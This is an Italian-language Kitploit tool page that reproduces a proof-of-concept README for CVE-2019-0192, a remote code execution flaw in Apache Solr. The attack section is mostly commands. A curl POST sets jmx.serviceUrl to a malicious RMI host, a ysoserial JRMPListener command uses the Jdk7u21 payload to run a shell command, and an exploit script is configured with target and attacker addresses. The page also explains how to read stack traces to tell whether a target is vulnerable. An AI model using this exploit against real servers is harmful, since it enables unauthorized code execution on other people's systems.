Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0192 — RCE su Apache Solr tramite deserializzazione di dati non attendibili via jmx.serviceUrl | Kitploit
Strumenti/GitHubGitHub/mpgn/cve-2019-0192
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubmpgn/cve-2019-0192

CVE-2019-0192

RCE su Apache Solr tramite deserializzazione di dati non attendibili via jmx.serviceUrl

Vedi Repository
2085537 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-0192 - Apache Solr RCE 5.0.0-5.5.5 e 6.0.0-6.6.5

Questa è una PoC preliminare della RCE di Apache Solr

Da https://issues.apache.org/jira/browse/SOLR-13301:

ConfigAPI consente di configurare il server JMX di Solr tramite una richiesta HTTP POST. Puntandolo a un server RMI malevolo, un attaccante potrebbe sfruttare la deserializzazione non sicura di Solr per innescare l'esecuzione remota di codice sul lato Solr.

Prova di Concetto

image


Esaminando la descrizione dell'avviso di sicurezza e controllando le risorse di ConfigAPI di Apache Solr, possiamo trovare un riferimento a un server JMX:

image

serviceUrl - (str opzionale) URL del servizio per un server JMX. Se non specificato, verrà utilizzato il server MBean predefinito della piattaforma.

Controllando il funzionamento di ConfigAPI possiamo riprodurre come impostare un server JMX remoto:

root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

Per la PoC userò yoserial per creare un server RMI malevolo usando il payload Jdk7u21

  1. Avvia il server RMI malevolo:
root@kitploit:~
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. Esegui la richiesta POST:
root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

nota: dovresti ottenere un errore 500 con un bel stacktrace

  1. Controlla lo stacktrace:
  • Se vedi questo errore: "Non-annotation type in annotation serial stream" significa che Apache Solr è in esecuzione con una versione di Java > JRE 7u25 e questa PoC non funzionerà

  • Altrimenti dovresti vedere questo errore: "undeclared checked exception; nested exception is" e la PoC dovrebbe funzionare.

Exploit

  1. Scarica yoserial : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. Modifica i valori nello script:
root@kitploit:~
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. Quindi esegui lo script:
root@kitploit:~
python3 CVE-2019-0192.py

Avviso di sicurezza:

  • http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

Risorse:

  • https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
  • https://issues.apache.org/jira/browse/SOLR-13301
Scarica lo strumento